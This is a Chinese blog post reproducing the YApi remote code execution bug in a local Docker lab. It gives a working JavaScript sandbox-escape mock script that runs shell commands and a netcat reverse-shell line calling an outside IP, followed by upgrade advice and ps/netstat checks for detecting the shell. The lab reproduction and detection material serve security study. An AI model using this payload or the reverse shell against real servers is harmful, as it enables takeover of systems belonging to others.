漏洞复现-yapi远程执行命令漏洞复现

已于 2023-07-22 16:44:06 修改
阅读量653 收藏 6
点赞数 1
分类专栏: # 漏洞复现 网络安全 文章标签: yapi
于 2023-07-22 16:37:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lady_killer9/article/details/131858853
版权

目录

漏洞原理

漏洞发现

查看issue2229
在这里插入图片描述

漏洞描述

网站开放注册功能时可随意注册,设置全局mock脚本可执行任意代码。

影响范围

Yapi <= 1.9.2

yapi学习

YApi 是高效、易用、功能强大的 api 管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。

通过官方文档学习如何新建项目
在这里插入图片描述
通过官方文档学习如何新建接口
在这里插入图片描述

通过官方文档学习Mock脚本与优先级
在这里插入图片描述

漏洞复现

环境搭建

这里使用的JayFong的docker-YApi,WEB UI在40001端口。修改了版本号为1.8.0

version: '3'

services:
  yapi-web:
    image: jayfong/yapi:1.8.0
    container_name: yapi-web
    ports:
      - 40001:3000
    environment:
      - YAPI_ADMIN_ACCOUNT=admin@docker.yapi
      - YAPI_ADMIN_PASSWORD=adm1n
      - YAPI_CLOSE_REGISTER=false
      - YAPI_DB_SERVERNAME=yapi-mongo
      - YAPI_DB_PORT=27017
      - YAPI_DB_DATABASE=yapi
      - YAPI_MAIL_ENABLE=false
      - YAPI_LDAP_LOGIN_ENABLE=false
      - YAPI_PLUGINS=[]
    depends_on:
      - yapi-mongo
    links:
      - yapi-mongo
    restart: unless-stopped
  yapi-mongo:
    image: mongo:latest
    container_name: yapi-mongo
    volumes:
      - ./data/db:/data/db
    expose:
      - 27017
    restart: unless-stopped

启动镜像

docker-compose up -d

启动后发现管理员账号密码不对,应该是环境变量在容器中没有使用,查看配置文件找到管理员账号
在这里插入图片描述
查看安装脚本,找到密码
在这里插入图片描述
打开WEB UI,使用admin@hello.yapi、ymfe.org登录
新建项目
在这里插入图片描述
新建接口
在这里插入图片描述

exp

设置全局mock脚本
在这里插入图片描述

const sandbox = this; // 获取Context
const ObjectConstructor = this.constructor; // 获取 Object 对象构造函数
const FunctionConstructor = ObjectConstructor.constructor; // 获取 Function 对象构造函数
const myfun = FunctionConstructor('return process'); // 构造一个函数,返回process全局变量
const process = myfun();
mockJson = process.mainModule.require("child_process").execSync("ls").toString()

可以把ls改为反弹shell等,例如

 nc 10.28.144.100  7777 -e /bin/sh

访问接口预览中的Mock地址即可看到命令结果。
在这里插入图片描述

入侵检测与防御

更新为最新版、禁止注册是最好的防御方式
在这里插入图片描述
入侵检测可以检测一下可疑的进程、网络连接,例如前面说的反弹Shell可以用下面的方式进行检测:
在这里插入图片描述

ps -eo pid,ppid,comm,args

在这里插入图片描述
可以看到进程1的子进程是117,很可疑

netstat -anp | grep ESTABLISHED

在这里插入图片描述

可以看到子进程117在与10.28.144.100的7777端口进行通信

参考

github-YMFE-yapi
yapi文档
yapi-issue2229
Awesome-POC-yapi
YApi Mock功能远程代码执行漏洞复现
gitee-JayFong-docker-YApi

lady_killer9
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
YAPI 安全漏洞问题,一文修复全解决
咻咻ing的专栏
08-09 793
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。 目前Yapi在GitHub的关注数有523,Star数21.7k,Fork数3.7k,使用的企业非常广泛,包括阿里巴巴、腾讯、百度、去哪儿等等。 近日,不少用户反映YApi平台存在高危漏洞,攻击者可利用该漏洞在目标服务器上执行任意代码,可
Webmin远程命令执行漏洞复现
yuan_boss的博客
10-12 441
详细的来说,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。payload中的IP改为目标网站的IP,注意user=rootxx这部分,如果写的是user=root,肯定不能成功注入,必须是目标网站的服务器中不存在的用户,否则就会命令执行失败。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
Yapi代码执行 waf绕过实战记录
最新发布
2401_83799022的博客
06-12 282
这预示着成功了一大步可以初步绕过waf的检测,之后赶紧访问保存的恶意脚本进行反弹 shell 结果 vps 半天没消息,就在怀疑该主机是否不出网的时候被叫吃中午饭了,暂放一阶段。当时,按照复线文章一步一步操作,直到保存脚本时却遇到了问题。的命令和参数是分开的,参考官方文档的参数格式要求再一次修改命令执行脚本,使用nc反弹结果等了个寂寞,后面改成了python反弹命令,保存后访问接口,结果啪的一下很突然,成功收到了反弹连接。查看了浏览器的网络请求状态,发现原来是保存恶意脚本的请求被拒绝了。
七、【漏洞复现】YApi接口管理平台远程代码执行漏洞
weixin_52351575的博客
09-21 381
​YApi接口管理平台存在一种远程代码执行漏洞。攻击者可以在注册并登录YApi后,通过构造特殊的请求来执行任意代码,从而接管服务器。这个漏洞可能会导致严重的安全风险,因此建议用户及时修复漏洞,更新到最新版本的YApi。3、 编辑Yapi目录下的 config.json 文件,设置 closeRegister 为 true,关闭Yapi的前台注册功能。若YApi对外开放注册功能,攻击者可在注册并登录后,通过构造特殊的请求执行任意代码,接管服务器。3.新建接口-接口名称随意-接口路径为/随意。
漏洞复现之YApi接口管理平台远程代码执行
白帽子九一
05-31 1086
1. 简介 YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台的API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台
漏洞复现】Metabase 远程命令执行漏洞(CVE-2023-38646)
做自己喜欢的事,并将其发挥到极致!
08-03 4513
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以服务器的权限级别在服务器上执行任意命令。
YApi远程命令执行漏洞分析.pdf
04-22
YApi远程命令执行漏洞分析.pdf
my-yapi.zip
05-20
最后,执行`npm run dev`启动YAPI服务。 4. **使用YAPI创建API文档** 在YAPI界面,可以创建新的项目并添加接口。每个接口可以定义URL、HTTP方法、请求参数、响应数据等,同时支持Markdown格式编写接口描述,便于...
tsapi-from-yapi:把yapi网站接口转换为本地typescript intserface接口
08-03
这种方式需要在package包中补充命令,全局安装不用 "scrpit":{ "tfy": "tfy" } 在当前工作目录创建配置文件tfy.config.js来生成你的代码,如下所示: module.exports = { urls: [ '...
docker-YApi:接口管理平台YApi的Docker架构
02-02
接下来,修改docker docker-compose.yml中yapi-web下的环境变量YAPI_ADMIN_ACCOUNT为你的管理员邮箱, YAPI_ADMIN_PASSWORD为你的管理员密码。最后,执行docker-compose up -d启动服务。然后,通过...
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 2391
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码。
【IP-guard WebServer 远程命令执行漏洞复现(0day)】
一纸荒芜的博客
11-10 3196
IP-guard Webserver远程命令执行漏洞(RCE)漏洞复现
[Vulfocus解题系列] yapi 代码执行
00勇士王子的博客
07-18 1010
漏洞介绍 名称: yapi 代码执行 描述: API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。 解题过程 1.打开靶场页面,进入注册页面,随意注册一个用户 2.注册后进入如下页面
yapi 代码执行
qq_32445755的博客
07-04 1053
YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。因为大量用户使用 YAPI的默认配置并允许从外部网络访问YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。请拿到flag,默认在/tmp/目录中。漏洞复现步骤注册测试账号:注册登录后,创建一个项目,然后选择设置全局的mock脚本点击保存开启添加接口,然后再点击预览可以看到
YAPI Mock远程代码执行漏洞
qq_17754023的博客
02-28 782
前言 YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业使用。 漏洞原理 YAPI项目使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务。其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本
[漏洞复现]Yapi Mock 远程代码执行漏洞复现
3tefanie丶zhou的博客
07-12 367
一丶漏洞介绍 YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。 二丶复现步骤 1.找到注册功能点,注册一个用户 2.利用注册的用户账号密码登陆,添加一个项目 3.然后添加接口 4.在添加的接口里面找到高级Moc,添加脚本POC,保存 5.在预览处点击Mock地址链接,复现成功 三丶修复方案 关闭注册功能,禁止使用默认账号密码 清除可疑账户 删除Mock恶意脚本 ...
YAPI漏洞复现
Websec
07-13 1848
YAPI漏洞复现 原地址: https://github.com/YMFE/yapi/issues/2099 一. fofa语法搜索 app=”YAPI” 从搜索到的结果当中任意选择一个地址,比如: http://xxxx:8081/ Yapi的平台默认是可以注册用户的,先注册一个用户进入后台. 注册用户账户密码 test123/test123 1. 首先新建一个项目 2. 新加一个接口 点击【添加接口】。 3. 在高级mo...
命令执行和代码执行漏洞
热门推荐
谢公子的博客
12-06 1万+
远程代码执行漏洞 代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。 修复方案:禁用 eval(),system()等可以执行命令的函数。如果一定要使用这些函数,则需要对用户的输入数据进行处理。此外,在PHP/JSP中...
openresty漏洞复现
04-03
OpenResty是一个基于Nginx的Web应用服务器,它通过Lua脚本语言扩展了Nginx的功能。关于OpenResty的漏洞复现,这里提供一个常见的漏洞示例:OpenResty的Lua代码注入漏洞。 Lua代码注入漏洞是指攻击者可以通过构造恶意请求,在OpenResty服务器上执行漏。攻击者可以利用该漏洞恶意操作,读取敏感文件、执行系统命令等。 下面是一个简单的OpenResty Lua代码注入漏洞复现示例: 1. 首先,创建一个名为test.lua的Lua脚本文件,内容如下: ```lua ngx.say("Hello, World!") ``` 2. 在OpenResty服务器上配置一个路由,将请求转发到test.lua脚本文件。例如,在nginx.conf文件中添加以下配置: ```nginx location /test { default_typetext/plain'; content_by_lua_file /path/to/test.lua; } ` 3. 重启OpenResty服务器使配置生效。 4. 访问http://yourdomain/test,将会执行test.lua脚本返回"Hello, World!"。 然而,需要注意的是,这只是一个简单的示例,实际的漏洞可能更加复杂和危险。在实际应用中,为了防止Lua代码注入漏洞,建议采取以下措施- 对用户输入进行严格的过滤和验证,避免将用户输入直接拼接到Lua代码中。 - 使用OpenResty提供的安全机制,如限制Lua代码的执行权限、禁用危险的Lua函数等。 - 及时更新Openy版本,以获取最新的安全修复。 希望以上信息对您有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lady_killer9

感谢您的打赏,我会加倍努力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值